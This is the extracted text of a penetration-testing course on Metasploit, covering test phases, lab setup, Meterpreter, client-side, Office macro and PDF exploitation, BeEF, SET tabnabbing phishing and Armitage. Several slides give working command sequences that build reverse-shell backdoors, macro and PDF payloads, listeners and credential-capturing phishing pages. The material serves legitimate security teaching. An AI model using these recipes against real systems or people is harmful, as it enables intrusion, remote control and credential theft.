Penetration Testing with METASPLOIT Am Chaitanya Krishna. A

Course Introduction

Course Outline Introduction to Penetration Testing Setting up Penetration testing Lab Metasploit 101 Meterpreter Client side attacks Exploiting client side vulnerabilities Exploiting Browser based vulnerabilities Social Engineering Toolkit Armitage PowerSploit Post exploitation Writing custom meterpreter scripts

Introduction to PENETRATION TESTING

Introduction to Penetration Testing “Penetration testing a method of evaluating the security of a computer system or network by simulating an attack” Penetration tests are valuable for several reasons Determining the feasibility of a particular set of attack vectors Identifying higher-risk vulnerabilities which could lead to security breach Identifying vulnerabilities Testing the ability of network defenders Providing evidence to support increased investments in security personal and technology

PTES ( Penetration Testing Execution Standard) Aimed to provide security standards for business organizations and security service providers Laid standard for performing penetration test (Beta). Pre-engagement Interactions Pre-engagement Interactions Intelligence Gathering Intelligence Gathering Threat Modeling Threat Modeling Vulnerability Analysis Vulnerability Analysis Exploitation Exploitation Post Exploitation Post Exploitation Reporting Reporting Source : Penetration Testing Execution Methodology Penetration Testing Execution Standard

Mainly involves with client interaction Mainly involves with client interaction Engagement Interactions Engagement Interactions Agenda focuses on Penetration testing Road Map Agenda focuses on Penetration testing Road Map Questionnaires Questionnaires Payment Terms Payment Terms Pre-Engagement Interactions

Main attribute is reconnaissance( Information Gathering ) in Penetration Test Main attribute is reconnaissance( Information Gathering ) in Penetration Test Reflects other stages of Penetration Testing Reflects other stages of Penetration Testing Different tools and scripts will be used for different platforms for Information Gathering Different tools and scripts will be used for different platforms for Information Gathering Intelligence Gathering

Depends on Intelligence gathered information and the pre-engagement information Methodology Business Asset Analysis Business Process Analysis Threat Agents/Community Analysis Threat Capability Analysis Motivation Modeling Finding relevant news of comparable Organizations being compromised Threat Modeling

Involves in discovering flaws in target system Involves in discovering flaws in target system Different tools and scripts will be used for performing vulnerability analysis on different platforms Different tools and scripts will be used for performing vulnerability analysis on different platforms Threat level classification need to be created for exploitation phase Threat level classification need to be created for exploitation phase Priority should be given for threat level, need to analyze and exploit threats Priority should be given for threat level, need to analyze and exploit threats Directly reflects in exploitation phase Directly reflects in exploitation phase Vulnerability Analysis

Completely depends on vulnerability analysis phase & mainly focus on target exploitation. Exploits target with appropriate exploit & with compatibility check Pentester need to evade security systems, need to bypass and trigger the exploit for successful exploitation ExploitationExploitation

Involves extending attack Pen-tester can analyze further information during post exploitation Might include juicy information Using post exploitation phase attacker can enhance his persistency over the compromised system Post Exploitation

Consists of Penetration testing executive summary and technical report. Executive summary mainly focuses on threat level severity, general findings, recommendation summary and road map Technical report carries out how vulnerability analysis, exploitation and post exploitation has done Based on reporting technical team can further move towards patch management. ReportingReporting

Setting up PENETRATION TESTING Lab

Will be focusing on creation of our own virtual test beds & third party one’s Will be focusing on creation of our own virtual test beds & third party one’s Every Test Bed is been added with multiple vulnerabilities Every Test Bed is been added with multiple vulnerabilities Everything will be on safe side (No Loss) Everything will be on safe side (No Loss) Running with different set of operating systems with different set of configurations with added vulnerabilities Running with different set of operating systems with different set of configurations with added vulnerabilities Setting up Penetration Lab

Lab Setup Overview

Virtualization, in computing, refers to the act of creating a virtual (rather than actual) version of something, including but not limited to a virtual computer hardware platform, operating system (OS), storage device, or computer network resources. --Wikipedia Virtualization software (Virtuabox, Vmware, Hypervisior) RAM(Minimum 4GB) Virtual Test beds or Operating system’s installer iso images Good processer above 2.8GHz VirtualizationVirtualization

The main operating system which got installed in a computer system Any operating system which got installed by using virtualization software Saving state of a virtual machine Copy state of a virtual machine Buzz Words

Installing and Setting up Virtual Lab

Snapshot and Cloning

METASPLOIT 101

Introduces Metasploit Framework Introduces Metasploit Framework Buzzwords, Architecture, Framework Architecture, Interfaces and Modules Buzzwords, Architecture, Framework Architecture, Interfaces and Modules Scope for exploiting target vulnerability using in built exploits and payloads Scope for exploiting target vulnerability using in built exploits and payloads Metasploit 101

Weakness existed in a system which could be compromised. Code which works on the target vulnerability system. Actual Code that lets an attacker to gain access after exploitation

Used for Penetration Testing IDS signature development Exploit Development Buzzing word security community Widely used Tool for Development and Testing Vulnerabilities Penetration Testing using Metasploit

Widely accepted tool for the Testing vulnerabilities Makes complex tasks more ease Posses rich set of modules organized in systematic manner Has Regular updates Contains different types exploits, Payloads, 500+ Auxiliary Modules Why we need Opt Metasploit

TOOLS PLUGINS REX MSFCORE MSF BASE PAYLOADS EXPLOITS ENCODERS POST-Mods Auxiliary LibrariesInterfaces Console CLI WEB GUI Armitage Modules Metasploit Architecture

Actual code which works on the target vulnerability system. MSF has modular organization of exploits based on OS and service classification 1.ManualRanking 2.LowRanking 3.AverageRanking 4.NormalRanking 5.GoodRanking 6.GreatRanking 7.ExcellentRanking Exploit Ranking Values Source : ExploitsExploits

1.ManualRanking : Exploit is so unstable or difficult to exploit and is basically a DoS 2.LowRanking : Exploit is nearly impossible to exploit (or under 50%) for common platforms 3.AverageRanking : Exploit is generally unreliable or difficult to exploit, then AverageRanking should be used 4.NormalRanking : Exploit is otherwise reliable, but depends on a specific version and can't reliably auto-detect auto-detect 5.GoodRanking : Exploit has a default target and it is the "common case" for this type of software 6.GreatRanking : Exploit has a default target AND either auto-detects the appropriate target or uses an application-specific return address AFTER a version check 7.ExcellentRanking: Exploit will never crash the service Source : Exploits Ranking

Payloads Stagers Stages Singles Self contained ones does specific taskBridges connection Establishmentpayload components that are downloaded by Stagers modules PayloadsPayloads

Critical component of penetration test. Assist pen tester to gather information about exploited system. Enhance attack in the targeted environment Can be extended in pivoting stage MSF has inbuilt and external scripts to perform Post Exploitation Varied for Different OS types Post Exploitation

MSF Auxiliary contains wide variety modules related to different services used for doing specific tasks Auxiliary Modules admincrawlersscannersfuzzers sniffers.... Example : Scanning for available directories existed in webserver Auxiliary Modules

MSF contains inbuilt and third party tools for which are widely used during regular Pentests during runtime Importing Nessus scan report, later which can be used for launching attack based on report Inbuilt MSF tools comes handy especially during post exploitation phase Ex: memdump MSF Tools and Plugins

MSF Tools

MSF Plugins

MSF Interfaces

Present Scenario

If exploit and payload gets executed

Meterpreter

MeterpreterMeterpreter

Its a default Goto Payload for Windows Provides Enhanced Command Shell for the attacker Consists of default set of core commands Can be extended at runtime by shipping DLLs on the Victim machine Meterpreter > Provides basic post-exploitation API MeterpreterMeterpreter

Getting a Meterpreter shell undergoes 3 different stages sends exploit + Stage 1 Payload sends DLL injection payload Meterpreter DLL starts communication Working of Meterpreter

Meterpreter basics Core Commands File System Commands Networking Commands System Commands User Interface Commands Covers usage of Meterpreter Working with Meterpreter

Stage : 1 Creating Executable Backdoor msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=44444 X >/var/www/evil.exe apachectl start Stage : 2 Enabling listener to connect back to attackers machine msfconsole msf > use exploit/multi/handler msf > set payload windows/meterpreter/reverse_tcp msf > set LHOST msf > set LPORT msf > exploit Launching Attack

Present Scenario

If exploit and payload gets executed

Core Commands

File System Commands

Networking Commands

System Commands

User Interface Commands

Client Side Attacks

Targets on exploitation of client side vulnerabilities Crack perimeter from the client side work environment Java Office suite 3rd party applications Browsers Includes : Whole agenda focus on client side exploitation :Client side software's Exploiting Vulnerable services Exploiting Vulnerable services Exposed to Hostile Servers Exposed to Hostile Servers Introduction to Client Side Attacks

Contains different set of Operating systems Preconfigured and added vulnerabilities Scenario based Different stages Different stages Security levels Security levels Goal is to Pwn Goal is to Pwn Lab Environment

Exploiting : Software based vulnerabilities Software based vulnerabilities Web based vulnerabilities Web based vulnerabilities Browser based vulnerabilities Browser based vulnerabilities AgendaAgenda

Introduction to Client Side Attacks

Stage -1

Attacker creates a Backdoor and deploys on unprotected system, where Anti Virus : Absent Updates : Absent Firewall : Absent Stage -1

Stage : 1 Creating Executable Backdoor msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=44444 X >/var/www/evil.exe apachectl start Stage : 2 Enabling listener to connect back to attackers machine msfconsole msf > use exploit/multi/handler msf > set payload windows/meterpreter/reverse_tcp msf > set LHOST msf > set LPORT msf > exploit Stage -1

Time for Demo Attacker Victim

Exploiting Client Side Vulnerabilities

Introduction to MSF Payloads Introduction to MSF Payloads Msfpayload, Msfencode, Msfvenom Msfpayload, Msfencode, Msfvenom Introduction to Binary payloads Introduction to Binary payloads Creating custom Binary payload types Creating custom Binary payload types File Format Exploits File Format Exploits Encoding payloads into VBA code Encoding payloads into VBA code Exploiting MS-Office suite programs using custom macros Exploiting MS-Office suite programs using custom macros Exploiting word and PDF documents Exploiting word and PDF documents Introduction to veil frame work Introduction to veil frame work Analyzing custom Binary payloads using Veil framework Analyzing custom Binary payloads using Veil framework Porting exploits and exploiting client side vulnerabilities Porting exploits and exploiting client side vulnerabilities Making persistent backdoors Making persistent backdoors Exploiting Client-Side Vulnerabilities

MSF contains different payloads with different set of options Inbuilt with custom set of commands Everything depends on payload suppleness Focus on Exploit development and Exploitation on different OS platforms depending on vulnerability existence. Introduction to MSF Payloads

Msfpayload module is used for creating custom executables, shellcode generation in different formats. Shellcode generated by msfpayload contains null characters, shellcode which is deployed or else passing in a network Might lead to AV / IDS & IPS detection. Msfencode module helps in avoid of bad characters. Msfpayload, Msfencode, Msfvenom

Developed by using msfpayload Requires bit of social engineering Attacker need to create an exe file and send it to victim machine On attacker side listener should be enable When ever victim opens up exe connection gets establishes Binary Payload

Stage : 1 Creating Executable Backdoor msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=44444 X >/var/www/evil.exe apachectl start Stage : 2 Enabling listener to connect back to attackers machine msfconsole msf > use exploit/multi/handler msf > set payload windows/meterpreter/reverse_tcp msf > set LHOST msf > set LPORT msf > exploit DEMODEMO

Users desktop environment contains various software applications and networking services Might contain outdated application or poorly configured security services Client side exploitation can be easily done by using any one of the following : Java Office suite 3rd party applications Browsers Exploiting File Format Vulnerabilities

Exploiting MS-Office Suite Programs

Stage : 1 Creating shellcode + payload msfvenom -p windows/meterpreter/reverse_tcp LHOST= lport= 443 -e shikata_ga_nai -i 5 -f vba > vba.txt Stage : 2 Enabling listener to connect back to attackers machine msfconsole msf > use exploit/multi/handler msf > set payload windows/meterpreter/reverse_tcp msf > set LHOST msf > set LPORT 443 msf > exploit Shellcode execution in MS-Office Macros

Exploiting PDF Documents

Msf>use exploit/windows/fileformat/adobe_pdf_embedded_exe Msf>set payload windows/meterpreter/reverse_tcp Msf>set LHOST Msf>set LPORT 4444 Msf>set INFILENAME /root/password.pdf SHARE THE PDF FILE WITH VICTIM Msf>use exploit/multi/handler Msf>set payload windows/meterpreter/reverse_tcp Msf>set LHOST Msf>set LPORT 4444 Msf>exploit Exploiting PDF Documents

Exploiting Software Based Vulnerabilities

Introduction to software based vulnerabilities Introduction to software based vulnerabilities Analyzing how to exploit fully patched system Analyzing how to exploit fully patched system Analyzing and exploiting software vulnerabilities Analyzing and exploiting software vulnerabilities Exploiting Software based Vulnerabilities

Targets on exploitation of client side vulnerabilities Crack perimeter from the client side work environment Whole agenda focus on client side exploitation :Client side software's Exploiting Vulnerable services Exploiting Vulnerable services Source : Introduction to software based vulnerabilities

Analyzing how to exploit fully patched machine

Lets check for any vulnerable service running on the victims machine We will exploit core software based vulnerabilities Analyzing how to exploit fully patched machine

Victim Environment

Analyzing and Exploiting Vulnerability

Exploiting Browser Based Vulnerabilities

Introduction to browser based vulnerabilities Introduction to browser based vulnerabilities Exploiting browser based vulnerabilities using Metasploit Exploiting browser based vulnerabilities using Metasploit Introduction to Browser Exploitation Framework (BeEF) Introduction to Browser Exploitation Framework (BeEF) Installing and Configuring Beef on attacker machine Installing and Configuring Beef on attacker machine Exploiting browser based vulnerabilities using BeEF Exploiting browser based vulnerabilities using BeEF Exploiting Browser based Vulnerabilities

A browser exploit is a form of malicious code that takes advantage of a flaw or vulnerability in an operating system or piece of software with the intent to breach browser security to alter a user's browser settings without their knowledge. Malicious code may exploit ActiveX, HTML, images, Java, JavaScript, and other Web technologies and cause the browser to run arbitrary code. -- Wikipedia Introduction to Browser Attacks

User environment might be running with outdated browser User environment might be running with outdated browser Victim need to browser attackers shared url Victim need to browser attackers shared url Once the victim navigates attacker Url victims machine will gets exploited and connection establishment takes place Once the victim navigates attacker Url victims machine will gets exploited and connection establishment takes place Exploitation Browser Vulnerabilities using MSF

Open source tool for testing and exploiting web application and browser-based vulnerabilities Testing and exploitation will be done from client side Features BeEF's modular framework allows addition of custom browser exploitation commands. The extension API allows users to change BeEF's core behavior. Keystroke logging Browser proxying Integration with Metasploit Plugin detection Intranet service exploitation Phonegap modules Hooking through QR codes Social Engineering modules spur user response such as entering sensitive data and responding to reminders to update software Restful API allows control of BeEF through http requests (JSON format). Source: Browser Exploitation Framework (BeEF)

© BeEF Project Browser Exploitation Framework (BeEF) Architecture

Installation apt-get update apt-get install beef-xss Configuring Edit config.yaml & set Metasploit : true vi /usr/share/beef-xss/config.yaml vi /usr/share/beef-xss/extensions/metasploit/config.yaml Add kali linux IP at line 18 and 26 host: " " callback_host: " " Add msf framework path at line 37 {os: 'custom', path: '/usr/share/metasploit-framework/'} Launching msf> load msgrpc ServerHost= Pass=abc123 cd /usr/share/beef-xss/ /usr/share/Metasploit-framework/./beef Installing and Configuring BeEF

beef

Time for Demo

Social Engineering Toolkit S.E.T. Social Engineering Toolkit S.E.T.

Introduction to social engineering Introduction to social engineering Introduction to SET Introduction to SET Installing and Configuring Social Engineering Toolkit Installing and Configuring Social Engineering Toolkit Working on SET modules and Launching Attacks using SET Working on SET modules and Launching Attacks using SET Social Engineering Toolkit

Kevin Mitnick Social Engineering

Self Interest Revenge Curiosity Mr.X, receiving pressure from friends, family or organized crime syndicates for reasons such as financial gain, self-interest and/or revenge Mr.X, want to access and/or modify information that is associated with a family member, colleague or even a neighbor. Mr.X, target a friend, colleague, organization or even a total stranger to satisfy the emotional desire for vengeance MotivationMotivation

People want to be helpful People want to avoid confrontation People like convenience People are messy People are curious. People appeal to the senses. Sometimes the help goes too far and they give away too much information. It's difficult for some people to ask others to prove who they are. They don't want confrontation. No one wants to be put out by additional security even though it may benefit the organization. By nature, they leave paper around, copy multiple people on , and leak data. A great example is an employee who finds a USB drive in the parking lot. The first thing they do when they get to their desk is plug it in to see what's on it. Building relationship with sweet voice. The Root Cause

Life Cycle of Social Engineering Life Cycle of Social Engineering

Social-Engineer Toolkit (SET) created and written by the founder of TrustedSec, Dave Kennedy Focuses exploiting human weakness Interfaces : Command line Web Introduction to SET

Introduction to Command-line Interface

Introduction to Web Interface

Tabnabbing Attack Performing Tabnabbing attack using SET Working on SET modules & launching attacks using SET

"It can detect that you're logged into Citibank right now and Citibank has been training you to log into your account every 15 minutes because it logs you out for better security. It's like being hit by the wrong end of the sword.” Aza Raskin Introduction to Tabnabbing

Attacker user customized scripts and hosting service to pretend it as a original page. How to do it Index1.html Index2.html Tabnab.js Hosting site Index-2.html Script.php Log.txt script.php Log.txt Index-1.html Script.js Behind Curtains

/usr/share/set/ 1.Social Engineering Attacks 2.website Attack vectors 4. Tabnabbing Enter Attackers IP Enter Attackers IP 2. Site Cloner Enter the url to clone Victim should open attackers url and need to switch to new tab. What ever the tab opened in back will get refreshed and loads Phishing page. If victim supplies credentials over there it will post back to Attackers machine Tabnabbing using SET

Captured Credentials

ArmitageArmitage

Introduction to Armitage Introduction to Armitage Installing and configuring Armitage Installing and configuring Armitage Host Management Host Management Dynamic Workspaces Dynamic Workspaces Importing Hosts Importing Hosts Scanning and exploiting targets Scanning and exploiting targets Exploit Automation Exploit Automation ArmitageArmitage

service postgresql start service metasploit start armitage GUI front-end for the Metasploit Framework developed by Raphael Mudge Kali Linux ships with inbuilt armitage and all the dependencies. Introduction to Armitage

Launching Armitage

Armitage UI

Adding Host

Scanning Host

Finding Attacks

Launching Attack

Compromised System

Thank You Thank You